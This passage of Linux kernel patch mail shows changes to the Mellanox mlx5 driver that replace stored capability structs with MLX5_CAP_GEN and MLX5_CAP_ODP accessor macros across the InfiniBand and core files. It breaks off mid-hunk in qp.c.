mlx5_ifc_eth_3635_cntrs_grp_data_layout_bits eth_3635_cntrs_grp_data_layout; + struct mlx5_ifc_eth_802_3_cntrs_grp_data_layout_bits eth_802_3_cntrs_grp_data_layout; + struct mlx5_ifc_eth_extended_cntrs_grp_data_layout_bits eth_extended_cntrs_grp_data_layout; + struct mlx5_ifc_eth_per_prio_grp_data_layout_bits eth_per_prio_grp_data_layout; + struct mlx5_ifc_eth_per_traffic_grp_data_layout_bits eth_per_traffic_grp_data_layout; + struct mlx5_ifc_lane_2_module_mapping_bits lane_2_module_mapping; + struct mlx5_ifc_pamp_reg_bits pamp_reg; + struct mlx5_ifc_paos_reg_bits paos_reg; + struct mlx5_ifc_pcap_reg_bits pcap_reg; + struct mlx5_ifc_peir_reg_bits peir_reg; + struct mlx5_ifc_pelc_reg_bits pelc_reg; + struct mlx5_ifc_pfcc_reg_bits pfcc_reg; + struct mlx5_ifc_phys_layer_cntrs_bits phys_layer_cntrs; + struct mlx5_ifc_pifr_reg_bits pifr_reg; + struct mlx5_ifc_pipg_reg_bits pipg_reg; + struct mlx5_ifc_plbf_reg_bits plbf_reg; + struct mlx5_ifc_plib_reg_bits plib_reg; + struct mlx5_ifc_plpc_reg_bits plpc_reg; + struct mlx5_ifc_pmaos_reg_bits pmaos_reg; + struct mlx5_ifc_pmlp_reg_bits pmlp_reg; + struct mlx5_ifc_pmlpn_reg_bits pmlpn_reg; + struct mlx5_ifc_pmpc_reg_bits pmpc_reg; + struct mlx5_ifc_pmpe_reg_bits pmpe_reg; + struct mlx5_ifc_pmpr_reg_bits pmpr_reg; + struct mlx5_ifc_pmtu_reg_bits pmtu_reg; + struct mlx5_ifc_ppad_reg_bits ppad_reg; + struct mlx5_ifc_ppcnt_reg_bits ppcnt_reg; + struct mlx5_ifc_pplm_reg_bits pplm_reg; + struct mlx5_ifc_pplr_reg_bits pplr_reg; + struct mlx5_ifc_ppsc_reg_bits ppsc_reg; + struct mlx5_ifc_pqdr_reg_bits pqdr_reg; + struct mlx5_ifc_pspa_reg_bits pspa_reg; + struct mlx5_ifc_ptas_reg_bits ptas_reg; + struct mlx5_ifc_ptys_reg_bits ptys_reg; + struct mlx5_ifc_pude_reg_bits pude_reg; + struct mlx5_ifc_pvlc_reg_bits pvlc_reg; + struct mlx5_ifc_slrg_reg_bits slrg_reg; + struct mlx5_ifc_sltp_reg_bits sltp_reg; + u8 reserved_0[0x60e0]; +}; + +union mlx5_ifc_debug_enhancements_document_bits { + struct mlx5_ifc_health_buffer_bits health_buffer; + u8 reserved_0[0x200]; +}; + +union mlx5_ifc_uplink_pci_interface_document_bits { + struct mlx5_ifc_initial_seg_bits initial_seg; + u8 reserved_0[0x20060]; }; #endif /* MLX5_IFC_H */ diff --git a/include/linux/mlx5/qp.h b/include/linux/mlx5/qp.h index 310b5f7fd6ae..f079fb1a31f7 100644 --- a/include/linux/mlx5/qp.h +++ b/include/linux/mlx5/qp.h @@ -134,13 +134,21 @@ enum { enum { MLX5_WQE_CTRL_CQ_UPDATE = 2 << 2, + MLX5_WQE_CTRL_CQ_UPDATE_AND_EQE = 3 << 2, MLX5_WQE_CTRL_SOLICITED = 1 << 1, }; enum { + MLX5_SEND_WQE_DS = 16, MLX5_SEND_WQE_BB = 64, }; +#define MLX5_SEND_WQEBB_NUM_DS (MLX5_SEND_WQE_BB / MLX5_SEND_WQE_DS) + +enum { + MLX5_SEND_WQE_MAX_WQEBBS = 16, +}; + enum { MLX5_WQE_FMR_PERM_LOCAL_READ = 1 << 27, MLX5_WQE_FMR_PERM_LOCAL_WRITE = 1 << 28, @@ -200,6 +208,23 @@ struct mlx5_wqe_ctrl_seg { #define MLX5_WQE_CTRL_WQE_INDEX_MASK 0x00ffff00 #define MLX5_WQE_CTRL_WQE_INDEX_SHIFT 8 +enum { + MLX5_ETH_WQE_L3_INNER_CSUM = 1 << 4, + MLX5_ETH_WQE_L4_INNER_CSUM = 1 << 5, + MLX5_ETH_WQE_L3_CSUM = 1 << 6, + MLX5_ETH_WQE_L4_CSUM = 1 << 7, +}; + +struct mlx5_wqe_eth_seg { + u8 rsvd0[4]; + u8 cs_flags; + u8 rsvd1; + __be16 mss; + __be32 rsvd2; + __be16 inline_hdr_sz; + u8 inline_hdr_start[2]; +}; + struct mlx5_wqe_xrc_seg { __be32 xrc_srqn; u8 rsvd[12]; From 938fe83c8dcbbf294d167e6163200a8540ae43c4 Mon Sep 17 00:00:00 2001 From: Saeed Mahameed Date: Thu, 28 May 2015 22:28:41 +0300 Subject: [PATCH 495/872] net/mlx5_core: New device capabilities handling - Query all supported types of dev caps on driver load. - Store the Cap data outbox per cap type into driver private data. - Introduce new Macros to access/dump stored caps (using the auto generated data types). - Obsolete SW representation of dev caps (no need for SW copy for each cap). - Modify IB driver to use new macros for checking caps. Signed-off-by: Saeed Mahameed Signed-off-by: Amir Vadai Signed-off-by: David S. Miller --- drivers/infiniband/hw/mlx5/cq.c | 8 +- drivers/infiniband/hw/mlx5/mad.c | 2 +- drivers/infiniband/hw/mlx5/main.c | 113 ++++++------- drivers/infiniband/hw/mlx5/mlx5_ib.h | 6 +- drivers/infiniband/hw/mlx5/mr.c | 3 +- drivers/infiniband/hw/mlx5/odp.c | 47 +++--- drivers/infiniband/hw/mlx5/qp.c | 84 +++++----- drivers/infiniband/hw/mlx5/srq.c | 7 +- drivers/net/ethernet/mellanox/mlx5/core/eq.c | 4 +- drivers/net/ethernet/mellanox/mlx5/core/fw.c | 90 ++++++---- .../net/ethernet/mellanox/mlx5/core/main.c | 154 ++++++------------ .../ethernet/mellanox/mlx5/core/mlx5_core.h | 10 +- drivers/net/ethernet/mellanox/mlx5/core/uar.c | 7 +- include/linux/mlx5/device.h | 66 +++++++- include/linux/mlx5/driver.h | 58 +------ 15 files changed, 310 insertions(+), 349 deletions(-) diff --git a/drivers/infiniband/hw/mlx5/cq.c b/drivers/infiniband/hw/mlx5/cq.c index 4e88b18cf62e..e2bea9ab93b3 100644 --- a/drivers/infiniband/hw/mlx5/cq.c +++ b/drivers/infiniband/hw/mlx5/cq.c @@ -753,7 +753,7 @@ struct ib_cq *mlx5_ib_create_cq(struct ib_device *ibdev, int entries, return ERR_PTR(-EINVAL); entries = roundup_pow_of_two(entries + 1); - if (entries > dev->mdev->caps.gen.max_cqes) + if (entries > (1 << MLX5_CAP_GEN(dev->mdev, log_max_cq_sz))) return ERR_PTR(-EINVAL); cq = kzalloc(sizeof(*cq), GFP_KERNEL); @@ -920,7 +920,7 @@ int mlx5_ib_modify_cq(struct ib_cq *cq, u16 cq_count, u16 cq_period) int err; u32 fsel; - if (!(dev->mdev->caps.gen.flags & MLX5_DEV_CAP_FLAG_CQ_MODER)) + if (!MLX5_CAP_GEN(dev->mdev, cq_moderation)) return -ENOSYS; in = kzalloc(sizeof(*in), GFP_KERNEL); @@ -1075,7 +1075,7 @@ int mlx5_ib_resize_cq(struct ib_cq *ibcq, int entries, struct ib_udata *udata) int uninitialized_var(cqe_size); unsigned long flags; - if (!(dev->mdev->caps.gen.flags & MLX5_DEV_CAP_FLAG_RESIZE_CQ)) { + if (!MLX5_CAP_GEN(dev->mdev, cq_resize)) { pr_info("Firmware does not support resize CQ\n"); return -ENOSYS; } @@ -1084,7 +1084,7 @@ int mlx5_ib_resize_cq(struct ib_cq *ibcq, int entries, struct ib_udata *udata) return -EINVAL; entries = roundup_pow_of_two(entries + 1); - if (entries > dev->mdev->caps.gen.max_cqes + 1) + if (entries > (1 << MLX5_CAP_GEN(dev->mdev, log_max_cq_sz)) + 1) return -EINVAL; if (entries == ibcq->cqe + 1) diff --git a/drivers/infiniband/hw/mlx5/mad.c b/drivers/infiniband/hw/mlx5/mad.c index 9cf9a37bb5ff..f2d9e70818d7 100644 --- a/drivers/infiniband/hw/mlx5/mad.c +++ b/drivers/infiniband/hw/mlx5/mad.c @@ -129,7 +129,7 @@ int mlx5_query_ext_port_caps(struct mlx5_ib_dev *dev, u8 port) packet_error = be16_to_cpu(out_mad->status); - dev->mdev->caps.gen.ext_port_cap[port - 1] = (!err && !packet_error) ? + dev->mdev->port_caps[port - 1].ext_port_cap = (!err && !packet_error) ? MLX_EXT_PORT_CAP_FLAG_EXTENDED_PORT_INFO : 0; out: diff --git a/drivers/infiniband/hw/mlx5/main.c b/drivers/infiniband/hw/mlx5/main.c index 57c9809e8b87..9075649f30fc 100644 --- a/drivers/infiniband/hw/mlx5/main.c +++ b/drivers/infiniband/hw/mlx5/main.c @@ -66,15 +66,13 @@ static int mlx5_ib_query_device(struct ib_device *ibdev, struct ib_device_attr *props) { struct mlx5_ib_dev *dev = to_mdev(ibdev); + struct mlx5_core_dev *mdev = dev->mdev; struct ib_smp *in_mad = NULL; struct ib_smp *out_mad = NULL; - struct mlx5_general_caps *gen; int err = -ENOMEM; int max_rq_sg; int max_sq_sg; - u64 flags; - gen = &dev->mdev->caps.gen; in_mad = kzalloc(sizeof(*in_mad), GFP_KERNEL); out_mad = kmalloc(sizeof(*out_mad), GFP_KERNEL); if (!in_mad || !out_mad) @@ -96,18 +94,18 @@ static int mlx5_ib_query_device(struct ib_device *ibdev, IB_DEVICE_PORT_ACTIVE_EVENT | IB_DEVICE_SYS_IMAGE_GUID | IB_DEVICE_RC_RNR_NAK_GEN; - flags = gen->flags; - if (flags & MLX5_DEV_CAP_FLAG_BAD_PKEY_CNTR) + + if (MLX5_CAP_GEN(mdev, pkv)) props->device_cap_flags |= IB_DEVICE_BAD_PKEY_CNTR; - if (flags & MLX5_DEV_CAP_FLAG_BAD_QKEY_CNTR) + if (MLX5_CAP_GEN(mdev, qkv)) props->device_cap_flags |= IB_DEVICE_BAD_QKEY_CNTR; - if (flags & MLX5_DEV_CAP_FLAG_APM) + if (MLX5_CAP_GEN(mdev, apm)) props->device_cap_flags |= IB_DEVICE_AUTO_PATH_MIG; props->device_cap_flags |= IB_DEVICE_LOCAL_DMA_LKEY; - if (flags & MLX5_DEV_CAP_FLAG_XRC) + if (MLX5_CAP_GEN(mdev, xrc)) props->device_cap_flags |= IB_DEVICE_XRC; props->device_cap_flags |= IB_DEVICE_MEM_MGT_EXTENSIONS; - if (flags & MLX5_DEV_CAP_FLAG_SIG_HAND_OVER) { + if (MLX5_CAP_GEN(mdev, sho)) { props->device_cap_flags |= IB_DEVICE_SIGNATURE_HANDOVER; /* At this stage no support for signature handover */ props->sig_prot_cap = IB_PROT_T10DIF_TYPE_1 | @@ -116,7 +114,7 @@ static int mlx5_ib_query_device(struct ib_device *ibdev, props->sig_guard_cap = IB_GUARD_T10DIF_CRC | IB_GUARD_T10DIF_CSUM; } - if (flags & MLX5_DEV_CAP_FLAG_BLOCK_MCAST) + if (MLX5_CAP_GEN(mdev, block_lb_mc)) props->device_cap_flags |= IB_DEVICE_BLOCK_MULTICAST_LOOPBACK; props->vendor_id = be32_to_cpup((__be32 *)(out_mad->data + 36)) & @@ -126,37 +124,38 @@ static int mlx5_ib_query_device(struct ib_device *ibdev, memcpy(&props->sys_image_guid, out_mad->data + 4, 8); props->max_mr_size = ~0ull; - props->page_size_cap = gen->min_page_sz; - props->max_qp = 1 << gen->log_max_qp; - props->max_qp_wr = gen->max_wqes; - max_rq_sg = gen->max_rq_desc_sz / sizeof(struct mlx5_wqe_data_seg); - max_sq_sg = (gen->max_sq_desc_sz - sizeof(struct mlx5_wqe_ctrl_seg)) / - sizeof(struct mlx5_wqe_data_seg); + props->page_size_cap = 1ull << MLX5_CAP_GEN(mdev, log_pg_sz); + props->max_qp = 1 << MLX5_CAP_GEN(mdev, log_max_qp); + props->max_qp_wr = 1 << MLX5_CAP_GEN(mdev, log_max_qp_sz); + max_rq_sg = MLX5_CAP_GEN(mdev, max_wqe_sz_rq) / + sizeof(struct mlx5_wqe_data_seg); + max_sq_sg = (MLX5_CAP_GEN(mdev, max_wqe_sz_sq) - + sizeof(struct mlx5_wqe_ctrl_seg)) / + sizeof(struct mlx5_wqe_data_seg); props->max_sge = min(max_rq_sg, max_sq_sg); - props->max_cq = 1 << gen->log_max_cq; - props->max_cqe = gen->max_cqes - 1; - props->max_mr = 1 << gen->log_max_mkey; - props->max_pd = 1 << gen->log_max_pd; - props->max_qp_rd_atom = 1 << gen->log_max_ra_req_qp; - props->max_qp_init_rd_atom = 1 << gen->log_max_ra_res_qp; - props->max_srq = 1 << gen->log_max_srq; - props->max_srq_wr = gen->max_srq_wqes - 1; - props->local_ca_ack_delay = gen->local_ca_ack_delay; + props->max_cq = 1 << MLX5_CAP_GEN(mdev, log_max_cq); + props->max_cqe = (1 << MLX5_CAP_GEN(mdev, log_max_eq_sz)) - 1; + props->max_mr = 1 << MLX5_CAP_GEN(mdev, log_max_mkey); + props->max_pd = 1 << MLX5_CAP_GEN(mdev, log_max_pd); + props->max_qp_rd_atom = 1 << MLX5_CAP_GEN(mdev, log_max_ra_req_qp); + props->max_qp_init_rd_atom = 1 << MLX5_CAP_GEN(mdev, log_max_ra_res_qp); + props->max_srq = 1 << MLX5_CAP_GEN(mdev, log_max_srq); + props->max_srq_wr = (1 << MLX5_CAP_GEN(mdev, log_max_srq_sz)) - 1; + props->local_ca_ack_delay = MLX5_CAP_GEN(mdev, local_ca_ack_delay); props->max_res_rd_atom = props->max_qp_rd_atom * props->max_qp; props->max_srq_sge = max_rq_sg - 1; props->max_fast_reg_page_list_len = (unsigned int)-1; - props->local_ca_ack_delay = gen->local_ca_ack_delay; props->atomic_cap = IB_ATOMIC_NONE; props->masked_atomic_cap = IB_ATOMIC_NONE; props->max_pkeys = be16_to_cpup((__be16 *)(out_mad->data + 28)); - props->max_mcast_grp = 1 << gen->log_max_mcg; - props->max_mcast_qp_attach = gen->max_qp_mcg; + props->max_mcast_grp = 1 << MLX5_CAP_GEN(mdev, log_max_mcg); + props->max_mcast_qp_attach = MLX5_CAP_GEN(mdev, max_qp_mcg); props->max_total_mcast_qp_attach = props->max_mcast_qp_attach * props->max_mcast_grp; props->max_map_per_fmr = INT_MAX; /* no limit in ConnectIB */ #ifdef CONFIG_INFINIBAND_ON_DEMAND_PAGING - if (dev->mdev->caps.gen.flags & MLX5_DEV_CAP_FLAG_ON_DMND_PG) + if (MLX5_CAP_GEN(mdev, pg)) props->device_cap_flags |= IB_DEVICE_ON_DEMAND_PAGING; props->odp_caps = dev->odp_caps; #endif @@ -172,14 +171,13 @@ int mlx5_ib_query_port(struct ib_device *ibdev, u8 port, struct ib_port_attr *props) { struct mlx5_ib_dev *dev = to_mdev(ibdev); + struct mlx5_core_dev *mdev = dev->mdev; struct ib_smp *in_mad = NULL; struct ib_smp *out_mad = NULL; - struct mlx5_general_caps *gen; int ext_active_speed; int err = -ENOMEM; - gen = &dev->mdev->caps.gen; - if (port < 1 || port > gen->num_ports) { + if (port < 1 || port > MLX5_CAP_GEN(mdev, num_ports)) { mlx5_ib_warn(dev, "invalid port number %d\n", port); return -EINVAL; } @@ -210,8 +208,8 @@ int mlx5_ib_query_port(struct ib_device *ibdev, u8 port, props->phys_state = out_mad->data[33] >> 4; props->port_cap_flags = be32_to_cpup((__be32 *)(out_mad->data + 20)); props->gid_tbl_len = out_mad->data[50]; - props->max_msg_sz = 1 << gen->log_max_msg; - props->pkey_tbl_len = gen->port[port - 1].pkey_table_len; + props->max_msg_sz = 1 << MLX5_CAP_GEN(mdev, log_max_msg); + props->pkey_tbl_len = mdev->port_caps[port - 1].pkey_table_len; props->bad_pkey_cntr = be16_to_cpup((__be16 *)(out_mad->data + 46)); props->qkey_viol_cntr = be16_to_cpup((__be16 *)(out_mad->data + 48)); props->active_width = out_mad->data[31] & 0xf; @@ -238,7 +236,7 @@ int mlx5_ib_query_port(struct ib_device *ibdev, u8 port, /* If reported active speed is QDR, check if is FDR-10 */ if (props->active_speed == 4) { - if (gen->ext_port_cap[port - 1] & + if (mdev->port_caps[port - 1].ext_port_cap & MLX_EXT_PORT_CAP_FLAG_EXTENDED_PORT_INFO) { init_query_mad(in_mad); in_mad->attr_id = MLX5_ATTR_EXTENDED_PORT_INFO; @@ -392,7 +390,6 @@ static struct ib_ucontext *mlx5_ib_alloc_ucontext(struct ib_device *ibdev, struct mlx5_ib_alloc_ucontext_req_v2 req; struct mlx5_ib_alloc_ucontext_resp resp; struct mlx5_ib_ucontext *context; - struct mlx5_general_caps *gen; struct mlx5_uuar_info *uuari; struct mlx5_uar *uars; int gross_uuars; @@ -403,7 +400,6 @@ static struct ib_ucontext *mlx5_ib_alloc_ucontext(struct ib_device *ibdev, int i; size_t reqlen; - gen = &dev->mdev->caps.gen; if (!dev->ib_active) return ERR_PTR(-EAGAIN); @@ -436,14 +432,14 @@ static struct ib_ucontext *mlx5_ib_alloc_ucontext(struct ib_device *ibdev, num_uars = req.total_num_uuars / MLX5_NON_FP_BF_REGS_PER_PAGE; gross_uuars = num_uars * MLX5_BF_REGS_PER_PAGE; - resp.qp_tab_size = 1 << gen->log_max_qp; - resp.bf_reg_size = gen->bf_reg_size; - resp.cache_line_size = L1_CACHE_BYTES; - resp.max_sq_desc_sz = gen->max_sq_desc_sz; - resp.max_rq_desc_sz = gen->max_rq_desc_sz; - resp.max_send_wqebb = gen->max_wqes; - resp.max_recv_wr = gen->max_wqes; - resp.max_srq_recv_wr = gen->max_srq_wqes; + resp.qp_tab_size = 1 << MLX5_CAP_GEN(dev->mdev, log_max_qp); + resp.bf_reg_size = 1 << MLX5_CAP_GEN(dev->mdev, log_bf_reg_size); + resp.cache_line_size = L1_CACHE_BYTES; + resp.max_sq_desc_sz = MLX5_CAP_GEN(dev->mdev, max_wqe_sz_sq); + resp.max_rq_desc_sz = MLX5_CAP_GEN(dev->mdev, max_wqe_sz_rq); + resp.max_send_wqebb = 1 << MLX5_CAP_GEN(dev->mdev, log_max_qp_sz); + resp.max_recv_wr = 1 << MLX5_CAP_GEN(dev->mdev, log_max_qp_sz); + resp.max_srq_recv_wr = 1 << MLX5_CAP_GEN(dev->mdev, log_max_srq_sz); context = kzalloc(sizeof(*context), GFP_KERNEL); if (!context) @@ -493,7 +489,7 @@ static struct ib_ucontext *mlx5_ib_alloc_ucontext(struct ib_device *ibdev, mutex_init(&context->db_page_mutex); resp.tot_uuars = req.total_num_uuars; - resp.num_ports = gen->num_ports; + resp.num_ports = MLX5_CAP_GEN(dev->mdev, num_ports); err = ib_copy_to_udata(udata, &resp, sizeof(resp) - sizeof(resp.reserved)); if (err) @@ -895,11 +891,9 @@ static void mlx5_ib_event(struct mlx5_core_dev *dev, void *context, static void get_ext_port_caps(struct mlx5_ib_dev *dev) { - struct mlx5_general_caps *gen; int port; - gen = &dev->mdev->caps.gen; - for (port = 1; port <= gen->num_ports; port++) + for (port = 1; port <= MLX5_CAP_GEN(dev->mdev, num_ports); port++) mlx5_query_ext_port_caps(dev, port); } @@ -907,11 +901,9 @@ static int get_port_caps(struct mlx5_ib_dev *dev) { struct ib_device_attr *dprops = NULL; struct ib_port_attr *pprops = NULL; - struct mlx5_general_caps *gen; int err = -ENOMEM; int port; - gen = &dev->mdev->caps.gen; pprops = kmalloc(sizeof(*pprops), GFP_KERNEL); if (!pprops) goto out; @@ -926,14 +918,17 @@ static int get_port_caps(struct mlx5_ib_dev *dev) goto out; } - for (port = 1; port <= gen->num_ports; port++) { + for (port = 1; port <= MLX5_CAP_GEN(dev->mdev, num_ports); port++) { err = mlx5_ib_query_port(&dev->ib_dev, port, pprops); if (err) { - mlx5_ib_warn(dev, "query_port %d failed %d\n", port, err); + mlx5_ib_warn(dev, "query_port %d failed %d\n", + port, err); break; } - gen->port[port - 1].pkey_table_len = dprops->max_pkeys; - gen->port[port - 1].gid_table_len = pprops->gid_tbl_len; + dev->mdev->port_caps[port - 1].pkey_table_len = + dprops->max_pkeys; + dev->mdev->port_caps[port - 1].gid_table_len = + pprops->gid_tbl_len; mlx5_ib_dbg(dev, "pkey_table_len %d, gid_table_len %d\n", dprops->max_pkeys, pprops->gid_tbl_len); } @@ -1207,8 +1202,8 @@ static void *mlx5_ib_add(struct mlx5_core_dev *mdev) strlcpy(dev->ib_dev.name, "mlx5_%d", IB_DEVICE_NAME_MAX); dev->ib_dev.owner = THIS_MODULE; dev->ib_dev.node_type = RDMA_NODE_IB_CA; - dev->ib_dev.local_dma_lkey = mdev->caps.gen.reserved_lkey; - dev->num_ports = mdev->caps.gen.num_ports; + dev->ib_dev.local_dma_lkey = 0 /* not supported for now */; + dev->num_ports = MLX5_CAP_GEN(mdev, num_ports); dev->ib_dev.phys_port_cnt = dev->num_ports; dev->ib_dev.num_comp_vectors = dev->mdev->priv.eq_table.num_comp_vectors; @@ -1286,9 +1281,9 @@ static void *mlx5_ib_add(struct mlx5_core_dev *mdev) dev->ib_dev.free_fast_reg_page_list = mlx5_ib_free_fast_reg_page_list; dev->ib_dev.check_mr_status = mlx5_ib_check_mr_status; - mlx5_ib_internal_query_odp_caps(dev); + mlx5_ib_internal_fill_odp_caps(dev); - if (mdev->caps.gen.flags & MLX5_DEV_CAP_FLAG_XRC) { + if (MLX5_CAP_GEN(mdev, xrc)) { dev->ib_dev.alloc_xrcd = mlx5_ib_alloc_xrcd; dev->ib_dev.dealloc_xrcd = mlx5_ib_dealloc_xrcd; dev->ib_dev.uverbs_cmd_mask |= diff --git a/drivers/infiniband/hw/mlx5/mlx5_ib.h b/drivers/infiniband/hw/mlx5/mlx5_ib.h index dff1cfcdf476..0c441add0464 100644 --- a/drivers/infiniband/hw/mlx5/mlx5_ib.h +++ b/drivers/infiniband/hw/mlx5/mlx5_ib.h @@ -617,7 +617,7 @@ int mlx5_ib_check_mr_status(struct ib_mr *ibmr, u32 check_mask, #ifdef CONFIG_INFINIBAND_ON_DEMAND_PAGING extern struct workqueue_struct *mlx5_ib_page_fault_wq; -int mlx5_ib_internal_query_odp_caps(struct mlx5_ib_dev *dev); +void mlx5_ib_internal_fill_odp_caps(struct mlx5_ib_dev *dev); void mlx5_ib_mr_pfault_handler(struct mlx5_ib_qp *qp, struct mlx5_ib_pfault *pfault); void mlx5_ib_odp_create_qp(struct mlx5_ib_qp *qp); @@ -631,9 +631,9 @@ void mlx5_ib_invalidate_range(struct ib_umem *umem, unsigned long start, unsigned long end); #else /* CONFIG_INFINIBAND_ON_DEMAND_PAGING */ -static inline int mlx5_ib_internal_query_odp_caps(struct mlx5_ib_dev *dev) +static inline void mlx5_ib_internal_fill_odp_caps(struct mlx5_ib_dev *dev) { - return 0; + return; } static inline void mlx5_ib_odp_create_qp(struct mlx5_ib_qp *qp) {} diff --git a/drivers/infiniband/hw/mlx5/mr.c b/drivers/infiniband/hw/mlx5/mr.c index 71c593583864..bc9a0de897cb 100644 --- a/drivers/infiniband/hw/mlx5/mr.c +++ b/drivers/infiniband/hw/mlx5/mr.c @@ -975,8 +975,7 @@ static struct mlx5_ib_mr *reg_create(struct ib_pd *pd, u64 virt_addr, struct mlx5_ib_mr *mr; int inlen; int err; - bool pg_cap = !!(dev->mdev->caps.gen.flags & - MLX5_DEV_CAP_FLAG_ON_DMND_PG); + bool pg_cap = !!(MLX5_CAP_GEN(dev->mdev, pg)); mr = kzalloc(sizeof(*mr), GFP_KERNEL); if (!mr) diff --git a/drivers/infiniband/hw/mlx5/odp.c b/drivers/infiniband/hw/mlx5/odp.c index 5099db08afd2..aa8391e75385 100644 --- a/drivers/infiniband/hw/mlx5/odp.c +++ b/drivers/infiniband/hw/mlx5/odp.c @@ -109,40 +109,33 @@ void mlx5_ib_invalidate_range(struct ib_umem *umem, unsigned long start, ib_umem_odp_unmap_dma_pages(umem, start, end); } -#define COPY_ODP_BIT_MLX_TO_IB(reg, ib_caps, field_name, bit_name) do { \ - if (be32_to_cpu(reg.field_name) & MLX5_ODP_SUPPORT_##bit_name) \ - ib_caps->field_name |= IB_ODP_SUPPORT_##bit_name; \ -} while (0) - -int mlx5_ib_internal_query_odp_caps(struct mlx5_ib_dev *dev) +void mlx5_ib_internal_fill_odp_caps(struct mlx5_ib_dev *dev) { - int err; - struct mlx5_odp_caps hw_caps; struct ib_odp_caps *caps = &dev->odp_caps; memset(caps, 0, sizeof(*caps)); - if (!(dev->mdev->caps.gen.flags & MLX5_DEV_CAP_FLAG_ON_DMND_PG)) - return 0; - - err = mlx5_query_odp_caps(dev->mdev, &hw_caps); - if (err) - goto out; + if (!MLX5_CAP_GEN(dev->mdev, pg)) + return; caps->general_caps = IB_ODP_SUPPORT; - COPY_ODP_BIT_MLX_TO_IB(hw_caps, caps, per_transport_caps.ud_odp_caps, - SEND); - COPY_ODP_BIT_MLX_TO_IB(hw_caps, caps, per_transport_caps.rc_odp_caps, - SEND); - COPY_ODP_BIT_MLX_TO_IB(hw_caps, caps, per_transport_caps.rc_odp_caps, - RECV); - COPY_ODP_BIT_MLX_TO_IB(hw_caps, caps, per_transport_caps.rc_odp_caps, - WRITE); - COPY_ODP_BIT_MLX_TO_IB(hw_caps, caps, per_transport_caps.rc_odp_caps, - READ); - -out: - return err; + + if (MLX5_CAP_ODP(dev->mdev, ud_odp_caps.send)) + caps->per_transport_caps.ud_odp_caps |= IB_ODP_SUPPORT_SEND; + + if (MLX5_CAP_ODP(dev->mdev, rc_odp_caps.send)) + caps->per_transport_caps.rc_odp_caps |= IB_ODP_SUPPORT_SEND; + + if (MLX5_CAP_ODP(dev->mdev, rc_odp_caps.receive)) + caps->per_transport_caps.rc_odp_caps |= IB_ODP_SUPPORT_RECV; + + if (MLX5_CAP_ODP(dev->mdev, rc_odp_caps.write)) + caps->per_transport_caps.rc_odp_caps |= IB_ODP_SUPPORT_WRITE; + + if (MLX5_CAP_ODP(dev->mdev, rc_odp_caps.read)) + caps->per_transport_caps.rc_odp_caps |= IB_ODP_SUPPORT_READ; + + return; } static struct mlx5_ib_mr *mlx5_ib_odp_find_mr_lkey(struct mlx5_ib_dev *dev, diff --git a/drivers/infiniband/hw/mlx5/qp.c b/drivers/infiniband/hw/mlx5/qp.c index 426eb88dfa49..15fd485d1ad9 100644 --- a/drivers/infiniband/hw/mlx5/qp.c +++ b/drivers/infiniband/hw/mlx5/qp.c @@ -220,13 +220,11 @@ static void mlx5_ib_qp_event(struct mlx5_core_qp *qp, int type) static int set_rq_size(struct mlx5_ib_dev *dev, struct ib_qp_cap *cap, int has_rq, struct mlx5_ib_qp *qp, struct mlx5_ib_create_qp *ucmd) { - struct mlx5_general_caps *gen; int wqe_size; int wq_size; - gen = &dev->mdev->caps.gen; /* Sanity check RQ size before proceeding */ - if (cap->max_recv_wr > gen->max_wqes) + if (cap->max_recv_wr > (1 << MLX5_CAP_GEN(dev->mdev, log_max_qp_sz))) return -EINVAL; if (!has_rq) { @@ -246,10 +244,11 @@ static int set_rq_size(struct mlx5_ib_dev *dev, struct ib_qp_cap *cap, wq_size = roundup_pow_of_two(cap->max_recv_wr) * wqe_size; wq_size = max_t(int, wq_size, MLX5_SEND_WQE_BB); qp->rq.wqe_cnt = wq_size / wqe_size; - if (wqe_size > gen->max_rq_desc_sz) { + if (wqe_size > MLX5_CAP_GEN(dev->mdev, max_wqe_sz_rq)) { mlx5_ib_dbg(dev, "wqe_size %d, max %d\n", wqe_size, - gen->max_rq_desc_sz); + MLX5_CAP_GEN(dev->mdev, + max_wqe_sz_rq)); return -EINVAL; } qp->rq.wqe_shift = ilog2(wqe_size); @@ -330,11 +329,9 @@ static int calc_send_wqe(struct ib_qp_init_attr *attr) static int calc_sq_size(struct mlx5_ib_dev *dev, struct ib_qp_init_attr *attr, struct mlx5_ib_qp *qp) { - struct mlx5_general_caps *gen; int wqe_size; int wq_size; - gen = &dev->mdev->caps.gen; if (!attr->cap.max_send_wr) return 0; @@ -343,9 +340,9 @@ static int calc_sq_size(struct mlx5_ib_dev *dev, struct ib_qp_init_attr *attr, if (wqe_size < 0) return wqe_size; - if (wqe_size > gen->max_sq_desc_sz) { + if (wqe_size > MLX5_CAP_GEN(dev->mdev, max_wqe_sz_sq)) { mlx5_ib_dbg(dev, "wqe_size(%d) > max_sq_desc_sz(%d)\n", - wqe_size, gen->max_sq_desc_sz); + wqe_size, MLX5_CAP_GEN(dev->mdev, max_wqe_sz_sq)); return -EINVAL; } @@ -358,9 +355,10 @@ static int calc_sq_size(struct mlx5_ib_dev *dev, struct ib_qp_init_attr *attr, wq_size = roundup_pow_of_two(attr->cap.max_send_wr * wqe_size); qp->sq.wqe_cnt = wq_size / MLX5_SEND_WQE_BB; - if (qp->sq.wqe_cnt > gen->max_wqes) { + if (qp->sq.wqe_cnt > (1 << MLX5_CAP_GEN(dev->mdev, log_max_qp_sz))) { mlx5_ib_dbg(dev, "wqe count(%d) exceeds limits(%d)\n", - qp->sq.wqe_cnt, gen->max_wqes); + qp->sq.wqe_cnt, + 1 << MLX5_CAP_GEN(dev->mdev, log_max_qp_sz)); return -ENOMEM; } qp->sq.wqe_shift = ilog2(MLX5_SEND_WQE_BB); @@ -375,13 +373,11 @@ static int set_user_buf_size(struct mlx5_ib_dev *dev, struct mlx5_ib_qp *qp, struct mlx5_ib_create_qp *ucmd) { - struct mlx5_general_caps *gen; int desc_sz = 1 << qp->sq.wqe_shift; - gen = &dev->mdev->caps.gen; - if (desc_sz > gen->max_sq_desc_sz) { + if (desc_sz > MLX5_CAP_GEN(dev->mdev, max_wqe_sz_sq)) { mlx5_ib_warn(dev, "desc_sz %d, max_sq_desc_sz %d\n", - desc_sz, gen->max_sq_desc_sz); + desc_sz, MLX5_CAP_GEN(dev->mdev, max_wqe_sz_sq)); return -EINVAL; } @@ -393,9 +389,10 @@ static int set_user_buf_size(struct mlx5_ib_dev *dev, qp->sq.wqe_cnt = ucmd->sq_wqe_count; - if (qp->sq.wqe_cnt > gen->max_wqes) { + if (qp->sq.wqe_cnt > (1 << MLX5_CAP_GEN(dev->mdev, log_max_qp_sz))) { mlx5_ib_warn(dev, 